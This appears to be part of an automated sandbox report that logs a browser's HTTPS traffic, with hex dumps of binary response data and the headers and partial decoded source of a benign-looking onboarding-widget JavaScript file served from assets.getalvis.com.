                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: e8 d8 48 07 ad 25 0a 51 57 92 4b 80 8d 4a d2 76 8b 6f 89 2e e8 71 8e 75 ad ef 8a 6e 87 18 e7 5a de f8 ac 0a 88 25 a6 99 f0 d4 44 f8 a5 61 b3 98 f6 96 91 d6 0a 8d 4a a5 4d eb 51 44 3a d5 56 a7 27 c5 9b 3d d0 e3 1c eb 5b df 14 dd 0e 31 ce b5 bd f1 5a e8 a3 7c d2 36 38 98 e7 c8 e3 66 b5 a2 e4 9e 80 b3 ab f0 4c 53 0f 84 4d 5d 87 d5 41 11 fb f2 46 40 f7 f0 28 70 a2 9d 9a 57 f9 16 55 2b 35 74 dd be 65 fb a1 c6 39 d6 b7 be 29 ba 1c 63 9d 6b 7b e2 b5 88 a7 45 4f 75 70 2b a6 a9 bc f8 9b 3d d0 e3 1c eb 5b df 14 dd 0e 31 ce b5 bd f1 5a c4 4d 15 3d d5 c0 69 aa 6f 3e 26 cf 74 38 c7 3a d6 f7 c5 37 43 8c 73 ad 6f 7c 56 b1 13 45 4f 75 70 1a 6a 9b cf 89 b3 dd 0e 31 ce b5 bd f1 4d d0 e3 1c eb 5b df 15 ac 44 d1 53 dd 5c 06 9a a6 f3 e2 6c f7 43 8c 73 ad 6f 7c 53 74 38 c7 3a
                                                                                                                                                                                                        Data Ascii: H%QWKJvo.qunZ%DaJMQD:V'=[1Z|68fLSM]AF@(pWU+5te9)ck{EOup+=[1ZM=io>&t8:7Cso|VEOupj1M[DS\lCso|St8:
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 0f 7a f2 65 56 ea 9c 8d a2 ce 24 98 f3 a2 b9 ff 00 b4 d9 16 2f 92 51 ff 00 c3 61 fe 74 9f d4 8b c7 62 a2 95 69 af 8b 3d b6 12 4d d0 83 7d 48 f2 2c a8 ff 00 12 62 9f 99 93 fa 96 b1 7d 0e 30 2c 26 71 b2 cd 86 d1 c9 2b fc e7 3d d1 02 5c 4f 09 2a bb 9c c1 79 a6 87 b9 6a eb c3 95 a1 18 a8 e5 d8 71 aa 72 3c e5 27 2c cb 59 f3 ba 2f a2 37 39 82 f3 4d 0f 72 d4 dc e6 0b cd 34 3d cb 55 b9 e2 1b ac a7 32 cf 79 1f 3b a2 fa 23 73 98 2f 34 d0 f7 2d 4d ce 60 bc d3 43 dc b5 39 e2 1b ac 73 2c f7 91 f3 b2 aa fa 23 73 98 2f 34 d0 f7 2d 4d ce 60 bc d3 43 dc b5 39 e2 1b ac 73 2c f7 91 f3 ba 2f a2 37
                                                                                                                                                                                                        Data Ascii: """ """ """ """ """ ""zeV$/Qatbi=M}H,b}0,&q+=\O*yjqr<',Y/79Mr4=U2y;#s/4-M`C9s,#s/4-M`C9s,/7
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 14 cd 77 11 53 a2 5c 65 20 cd 77 11 4c d7 71 15 3a 25 c6 52 0c d7 71 15 4c d3 c4 56 42 25 c6 53 19 16 41 68 3a c2 89 ec cd d2 35 29 4c 34 58 88 8a 48 08 88 80 87 f1 1f d6 3e 41 13 f1 1f d6 3e 41 14 32 c5 d4 ff 00 51 1f 52 91 47 4f f5 11 f5 29 14 95 0a ac 19 ce b2 a2 96 11 ac a3 08 90 0b 0d 08 88 a8 5c 22 22 00 88 88 02 22 20 08 88 80 22 22 00 88 88 02 22 20 08 88 80 22 2c 69 2b 63 63 cb 6c e7 11 ae c8 0c 94 58 9b 7e 3e 43 fe 09 b7 e3 e4 3f e0 a6 c4 5d 19 68 b1 36 fc 7c 87 fc 13 6f c7 c8 7f c1 2c 2e 8c b4 58 9b 7e 3e 43 fe 09 b7 e3 e4 3f e0 96
                                                                                                                                                                                                        Data Ascii: qwS\e wLq:%RqwS\e wLq:%RqwS\e wLq:%RqwS\e wLq:%RqLVB%SAh:5)L4XH>A>A2QRGO)\""" """ ",i+cclX~>C?]h6|o,.X~>C?
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: b3 e1 dc d7 07 61 be 09 b3 e1 dc d7 07 61 be 09 a3 c5 76 78 3f 31 a4 c2 76 b8 af 23 2b 75 58 1f 3a 52 f6 d3 75 58 1f 3a 52 f6 d6 2e cf 87 73 5c 1d 86 f8 26 cf 87 73 5c 1d 86 78 26 8f 17 d9 e0 fc c6 93 09 da e2 bc 8c ad d5 60 7c e9 4b db 4d d5 60 7c e9 4b db 58 9b 3e 1d cd 70 76 1b e0 9b 3e 1d cd 70 76 1b e0 9a 3c 5f 67 83 f3 1a 4c 27 6b 8a f2 32 f7 55 81 f3 a5 2f 6d 37 55 81 f3 a5 2f 6d 62 6d 8c 3b 9a e0 ec 37 c1 53 6c 61 dc d7 07 61 be 09 a3 c5 f6 78 3f 31 a4 c2 76 b8 af 23 33 75 58 1f 3a 52 f6 d3 75 58 1f 3a 52 f6 d6 1e d8 c3 b9 ae 0e c3 3c 13 6c e1 dc d7 07 61 9e 09 a2 c5 f6 7c 7c c6 93 09 da e2 bc 8c cd d5 60 7c e9 4b db 4d d5 60 7c e9 4b db 58 5b 67 0e e6 b8 7b 0c f0 4d b5 87 73 54 1d 86 78 26 8b 17 d9 f1 f3 1a 5c 27 6b 8a f2 33 77 55 81 f3 a5 2f 6d
                                                                                                                                                                                                        Data Ascii: aavx?1v#+uX:RuX:R.s\&s\x&`|KM`|KX>pv>pv<_gL'k2U/m7U/mbm;7Slaax?1v#3uX:RuX:R<la||`|KM`|KX[g{MsTx&\'k3wU/m
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 8c a8 b2 c9 65 48 9d 9f 13 5d 7d 27 5a bf 85 4d ca e5 2d b2 59 5c a9 75 37 19 4a 59 2c ab a4 a5 92 e4 65 2d b2 59 57 5a a6 84 b8 ca 50 85 4b 2b b5 ea 42 08 29 71 94 b6 c9 65 55 4d 27 52 9c c3 29 4b 2a 59 5c 75 d9 52 fa 52 e4 65 2d b2 a1 0a fe 0d 25 51 c4 5b 42 66 19 4b 2c a9 65 50 6f ad 09 17 2a 6e 46 52 c2 15 2c ae ba a1 4c c3 21 69 0a d2 15 c5 51 4d c8 ca 5a 42 a1 0a e5 42 52 e4 65 2d b2 b4 85 71 2a 84 a9 b8 ca 6c f2 64 5a ba 4f e5 ff 00 70 ab 90 3f 65 d6 7e 7a 6f 9a 64 df fc f4 9f cb fe e1 32 07 ec ba cf cf 4d f3 5c fa fe f1 0e e7 f8 37 e8 2b 61 a7 de bf 27 4c 88 8b 60 d7 08 88 80 22 22 02 d9 77 85 40 a7 97 78 54 0a d1 2a c2 22 29 20 87 f1 1f d6 3e 41 13 f1 1f d6 3e 41 14 32 c5 d4 ff 00 51 1f 52 91 47 4f f5 11 f5 29 14 95 0a 68 77 9e d5 0a 9a 1d e7 b5
                                                                                                                                                                                                        Data Ascii: eH]}'ZM-Y\u7JY,e-YWZPK+B)qeUM'R)K*Y\uRRe-%Q[BfK,ePo*nFR,L!iQMZBBRe-q*ldZOp?e~zod2M\7+a'L`""w@xT*") >A>A2QRGO)hw
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: d3 75 49 34 5a 37 2f 89 8d 82 30 35 d8 68 e8 58 d2 c8 eb 9d 3a 38 16 64 ba 6c 0e a2 15 81 8c 6e 9c dd 21 63 2e 62 c4 e3 33 f3 4b c3 6c 34 82 34 dd 64 6c 67 41 cf 37 ea 47 4a 18 6e 7d eb 16 5a c0 09 03 52 92 0a cf 0b de d0 2e d7 74 5e cb 0f 61 7e cb 60 d2 2d c2 a5 a6 ae 6b 66 21 fa ae b2 df 33 5a d7 38 96 96 8d 4a c9 b5 a8 ab 49 91 b6 50 00 0e 36 b7 02 8e 79 de d6 dd 8d b8 e1 b2 9a 0a 98 a6 03 63 b5 c8 b2 a1 74 79 af 60 b0 68 d7 a1 54 b1 ac 38 8d a4 f3 cd 88 e2 58 b5 18 a4 b2 68 6f 98 05 ed 64 ab 63 04 ae cc 21 cd e3 e2 58 f9 c0 8b 10 b3 28 ad a6 27 27 b0 b6 4a 82 fc d2 fd f0 e1 59 11 56 10 dc d2 33 9b c4 a1 8a 95 d3 b8 88 d9 9e 47 00 59 83 0e 2c 95 91 cc 59 62 2e 6c 75 29 79 48 8e 63 06 4a 87 cd 2d 9a db 34 6a 1a 96 c5 91 c6 fa 7d 20 ec 80 6b 05 4d 4d 15
                                                                                                                                                                                                        Data Ascii: uI4Z7/05hX:8dln!c.b3Kl44dlgA7GJn}ZR.t^a~`-kf!3Z8JIP6ycty`hT8Xhodc!X(''JYV3GY,Yb.lu)yHcJ-4j} kMM
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: c7 4f 18 56 6a cb 51 09 dd eb 3b 78 61 8e 06 e6 c2 c0 38 2f 6d 6b 16 b2 18 dd 23 49 70 07 84 1e 15 7c 35 4c a8 80 4d 1b bc c2 34 ac 63 24 73 4c 2e e3 60 b5 ba 4d 83 01 d4 d5 7e 76 6c 37 be a2 0e 85 8d 51 15 63 1b fc 48 9d 66 f0 8d 21 74 21 cd be 8b fb 55 49 61 3a ec 6d a9 59 4f e0 55 c2 fd 27 1e f9 8f 59 50 ba 67 e7 02 db 82 3a 56 ee ba 92 09 aa 4d 9f 98 e3 af cd d0 b5 86 86 72 f0 23 cd 79 bd 85 96 78 ca 2c c1 28 c9 1b 8a 26 3e 7a 08 de 5f e7 b8 59 da 55 5c e6 c4 d3 e6 b3 3c 68 d5 ac 25 15 3c f4 90 3d 93 96 5d c7 40 1f 35 4a b6 30 c7 e6 bb 49 d0 56 07 b4 ce b6 1a 96 b9 95 55 84 17 06 34 9e 15 b6 d9 21 a6 63 1b 4f 6b e7 69 d3 7b ae 7a b6 07 53 58 93 ac db 46 a5 6b 23 9f 45 a2 93 8f 7a b3 38 a9 74 98 54 9c 5e cd 67 4d 79 66 05 c3 e6 a3 32 08 5e c0 f7 69 71
                                                                                                                                                                                                        Data Ascii: OVjQ;xa8/mk#Ip|5LM4c$sL.`M~vl7QcHf!t!UIa:mYOU'YPg:VMr#yx,(&>z_YU\<h%<=]@5J0IVU4!cOki{zSXFk#Ez8tT^gMyf2^iq
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 97 78 54 0a 79 77 85 40 ad 12 ac 22 22 92 08 7f 11 fd 63 e4 11 3f 11 fd 63 e4 11 43 2c 5d 4f f5 11 f5 29 14 74 ff 00 51 1f 52 91 49 50 a6 87 79 ed 50 a9 a1 de 7b 54 32 51 7a b1 ea f5 64 82 e1 54 b1 c3 e4 d6 23 4b 87 56 63 54 d5 75 0c 8a 5d ba f7 86 b8 e9 70 3c 2b 77 36 2d 49 2c 5f c2 9b 38 91 76 e6 dd 73 f8 b5 1c 14 59 6d 1d 4d 43 18 22 ae 8f 35 92 39 b7 cc 90 5a e3 a2 f6 1e f5 89 8e 99 22 98 1a 70 27 04 00 03 24 03 63 e9 b1 d6 56 9e 11 b8 c1 d3 e9 8b 6b f2 bc 0d ec 5c 73 cd 54 e8 92 4f c2 cf c4 f2 af f8 81 c4 b3 f0 ca 16 56 cd 0b eb a3 98 e6 08 f5 b1 87 80 fc 16 1f 92 97 45 5b a2 47 41 24 52 b7 ce 8a 51 76 b8 2f 3d ca ea 59 6a f1 1c 56 19 64 7b 9c ea a9 b4 93 72 0e 71 b5 bd c1 6a bc 9f 53 54 62 72 d5 61 92 d5 54 c5 51 01 ce 8e 38 64 cc 2e 37 d3 d7 d0 15
                                                                                                                                                                                                        Data Ascii: xTyw@""c?cC,]O)tQRIPyP{T2QzdT#KVcTu]p<+w6-I,_8vsYmMC"59Z"p'$cVk\sTOVE[GA$RQv/=YjVd{rqjSTbraTQ8d.7
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: fa 7d 49 66 c2 6b 64 6d b3 e0 bf fb bc 16 34 19 3b 56 5e ed 9e a2 20 c3 c8 04 9f 8a 93 71 94 1e b5 89 7e a9 c9 b8 cc 3f d6 b1 2f d5 39 57 49 5f 71 71 f4 2d 92 86 fb fa 7d 4b b1 1a da 2c 9b c3 b6 bd 28 0f ab 7e 88 60 66 97 c8 f3 a8 90 16 6e 4b 61 af c2 b0 58 29 e6 37 9c de 49 48 e5 b8 dc f8 2a e1 39 3d 86 e1 72 19 69 69 ff 00 8e 74 19 64 71 7b fd e5 6d 92 9d 39 b9 e9 2a ed e8 5d 44 54 a9 05 0d 1d 2d 9b 5b 7d 3f 20 88 8b 64 d6 08 88 80 22 22 02 d9 77 85 40 a7 97 78 54 0a d1 2a c2 22 29 20 87 f1 1f d6 3e 41 13 f1 1f d6 3e 41 14 32 c5 d4 ff 00 51 1f 52 91 47 4f f5 11 f5 29 14 95 0a 68 77 9e d5 0a 9a 1d e7 b5 43 25 17 aa 38 5c 2a a2 a9 63 4b 94 38 54 78 b6 1e fa 79 0e 63 af 9d 1c 83 5b 1c 35 15 c1 57 cd 51 33 dd 43 8b d3 d3 1a f8 85 81 93 cc d9 47 29 af 0b d5
                                                                                                                                                                                                        Data Ascii: }Ifkdm4;V^ q~?/9WI_qq-}K,(~`fnKaX)7IH*9=riitdq{m9*]DT-[}? d""w@xT*") >A>A2QRGO)hwC%8\*cK8Txyc[5WQ3CG)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        68192.168.2.549836104.21.84.574436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC537OUTGET /alvis-onboard-1.0.8.js HTTP/1.1
                                                                                                                                                                                                        Host: assets.getalvis.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                        Referer: https://publicate.it/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:21 GMT
                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                        Content-Length: 20666
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Thu, 27 Jan 2022 21:53:01 GMT
                                                                                                                                                                                                        etag: "1200a42843993dec74b309e4b1a1cbab"
                                                                                                                                                                                                        x-cache: Hit from cloudfront
                                                                                                                                                                                                        via: 1.1 b9fa5c33e059fb3ed603bd8fcb9d4aea.cloudfront.net (CloudFront)
                                                                                                                                                                                                        x-amz-cf-pop: JFK50-P1
                                                                                                                                                                                                        x-amz-cf-id: SO74K0zrMburItZ7WIBy99bOjJdRt3O6Tn3W845wpAvk8CKJf-jkAw==
                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                        CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9vqpy7%2BPoXEBMi3hUNNi%2BMe4Zf63Mt%2BlAyg3G%2Big9XK%2F8EDf0i3Vm9iwexYUQMdR9V%2BHhundDjzfNAquZZqOFrbQUojGp19sOSGOeNGbchYNpkQAKJfSSrXhSNIKDPssoplSW%2FF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615b5feb15e64-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC452INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 74 28 69 29 7b 69 66 28 6e 5b 69 5d 29 72 65 74 75 72 6e 20 6e 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 63 3d 6e 5b 69 5d 3d 7b 69 3a 69 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 69 5d 2e 63 61 6c 6c 28 63 2e 65 78 70 6f 72 74 73 2c 63 2c 63 2e 65 78 70 6f 72 74 73 2c 74 29 2c 63 2e 6c 3d 21 30 2c 63 2e 65 78 70 6f 72 74 73 7d 74 2e 6d 3d 65 2c 74 2e 63 3d 6e 2c 74 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 69 29 7b 74 2e 6f 28 65 2c 6e 29 7c 7c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 69 7d 29 7d 2c 74 2e 72 3d 66 75 6e
                                                                                                                                                                                                        Data Ascii: !function(e){var n={};function t(i){if(n[i])return n[i].exports;var c=n[i]={i:i,l:!1,exports:{}};return e[i].call(c.exports,c,c.exports,t),c.l=!0,c.exports}t.m=e,t.c=n,t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:i})},t.r=fun
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 74 28 65 29 29 2c 38 26 6e 29 72 65 74 75 72 6e 20 65 3b 69 66 28 34 26 6e 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 69 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 3b 69 66 28 74 2e 72 28 69 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 69 2c 22 64 65 66 61 75 6c 74 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 65 7d 29 2c 32 26 6e 26 26 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 29 66 6f 72 28 76 61 72 20 63 20 69 6e 20 65 29 74 2e 64 28 69 2c 63 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 7d 2e 62 69 6e 64 28 6e 75 6c 6c 2c 63 29 29 3b 72 65
                                                                                                                                                                                                        Data Ascii: t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var c in e)t.d(i,c,function(n){return e[n]}.bind(null,c));re
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 54 69 6d 65 6f 75 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 28 65 2c 6e 2c 74 2c 63 2c 6f 29 7d 29 2c 32 65 34 2a 6f 29 3a 76 6f 69 64 20 30 21 3d 3d 74 26 26 74 26 26 74 28 74 68 69 73 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 29 29 7d 2c 72 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 3d 21 30 2c 72 2e 6f 70 65 6e 28 63 2c 65 2c 21 30 29 2c 72 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 3d 21 31 2c 22 50 4f 53 54 22 3d 3d 3d 63 26 26 61 26 26 72 2e 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 28 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 2c 72 2e 73 65 6e 64 28 61 29 2c 6f 2b 2b 7d 2c 63 3d 69 2c 6f 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74
                                                                                                                                                                                                        Data Ascii: Timeout((function(){i(e,n,t,c,o)}),2e4*o):void 0!==t&&t&&t(this.responseText)))},r.crossDomain=!0,r.open(c,e,!0),r.withCredentials=!1,"POST"===c&&a&&r.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),r.send(a),o++},c=i,o="undefined"==t
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 64 69 73 6d 69 73 73 22 7d 28 70 7c 7c 28 70 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 76 61 72 20 6e 3d 65 5b 30 5d 2c 74 3d 65 5b 31 5d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 29 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 22 72 65 61 64 79 22 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 70 2e 52 45 41 44 59 2c 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 64 69 73 6d 69 73 73 22 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 70 2e 44 49 53 4d 49 53 53 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 76 61 72 20 6e 3d 65
                                                                                                                                                                                                        Data Ascii: dismiss"}(p||(p={}));function m(e){void 0===e&&(e=[]);var n=e[0],t=e[1];if("function"==typeof t)switch(n){case"ready":document.addEventListener(p.READY,t);break;case"dismiss":document.addEventListener(p.DISMISS,t)}}function _(e){void 0===e&&(e=[]);var n=e
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 22 3a 61 2e 69 64 65 6e 74 69 66 79 28 6e 5b 30 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 70 61 67 65 22 3a 61 2e 70 61 67 65 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 75 70 64 61 74 65 22 3a 61 2e 75 70 64 61 74 65 28 6e 5b 30 5d 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 74 72 61 63 6b 22 3a 61 2e 74 72 61 63 6b 28 6e 29 7d 7d 3b 76 61 72 20 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 30 2c 6e 3d 30 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 6e 2b 2b 29 65 2b 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 2e 6c 65 6e 67 74 68 3b 76 61 72 20 69 3d 41 72 72 61 79 28 65 29 2c 63 3d 30 3b 66 6f 72 28 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 66 6f 72 28 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 2c 61 3d 30 2c
                                                                                                                                                                                                        Data Ascii: ":a.identify(n[0]);break;case"page":a.page();break;case"update":a.update(n[0]);break;case"track":a.track(n)}};var f=function(){for(var e=0,n=0,t=arguments.length;n<t;n++)e+=arguments[n].length;var i=Array(e),c=0;for(n=0;n<t;n++)for(var o=arguments[n],a=0,
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 6f 6d 3a 20 39 30 70 78 3b 5c 6e 20 20 20 20 72 69 67 68 74 3a 20 31 30 30 70 78 3b 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 34 30 30 70 78 3b 5c 6e 20 20 20 20 68 65 69 67 68 74 3a 20 34 36 30 70 78 3b 5c 6e 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 35 29 20 30 70 78 20 35 70 78 20 33 30 70 78 3b 5c 6e 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 5c 6e 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 5c 6e 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 5c 6e 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 39 35 70 78 29 3b 5c 6e 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 62 6f 74 74 6f 6d 20 30 2e 32 35 73 20 65 61 73 65 20
                                                                                                                                                                                                        Data Ascii: om: 90px;\n right: 100px;\n width: 400px;\n height: 460px;\n box-shadow: rgba(0, 0, 0, 0.15) 0px 5px 30px;\n border-radius: 8px;\n overflow: hidden;\n opacity: 1;\n max-height: calc(100% - 95px);\n transition: bottom 0.25s ease
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 6e 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 5c 6e 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 32 31 34 37 34 38 33 30 30 31 3b 5c 6e 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 37 32 30 70 78 3b 5c 6e 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 30 70 78 3b 5c 6e 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2e 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 64 6c 2d 6f 70 65 6e 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 6d 64 6c 2d 69 6e 6e 65 72 20 69 66 72 61 6d 65 7b 5c 6e 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 5c 6e 20 20 20 20 62 6f 72 64 65
                                                                                                                                                                                                        Data Ascii: n position: relative;\n z-index: 2147483001;\n max-width: 720px;\n padding: 40px;\n margin: 0 auto;\n }\n\n #alvis-nbcl-container.alvis-nbcl-container--mdl-open #alvis-nbcl-mdl-inner iframe{\n width: 100%;\n height: 100%;\n borde
                                                                                                                                                                                                        2024-08-30 16:16:21 UTC1369INData Raw: 3a 20 6e 6f 6e 65 3b 5c 6e 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 31 70 78 2c 20 31 70 78 29 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 6c 61 75 6e 63 68 65 72 20 2e 61 6c 76 69 73 2d 6e 62 63 6c 2d 74 69 74 6c 65 20 7b 5c 6e 20 20 20 20 63 6f 6c 6f 72 3a 20 7b 7b 69 6e 76 5f 74 68 65 6d 65 5f 63 6f 6c 6f 72 7d 7d 3b 5c 6e 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 5c 6e 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 5c 6e 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 5c 6e 20 20 7d 5c 6e 5c 6e 20 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 6c 61 75 6e 63 68 65 72 20 23 61 6c 76 69 73 2d 6e 62 63 6c 2d 63 6f 75 6e
                                                                                                                                                                                                        Data Ascii: : none;\n transform: translate(1px, 1px);\n }\n\n #alvis-nbcl-launcher .alvis-nbcl-title {\n color: {{inv_theme_color}};\n display: flex;\n justify-content: space-between;\n font-size: 16px;\n }\n\n #alvis-nbcl-launcher #alvis-nbcl-coun
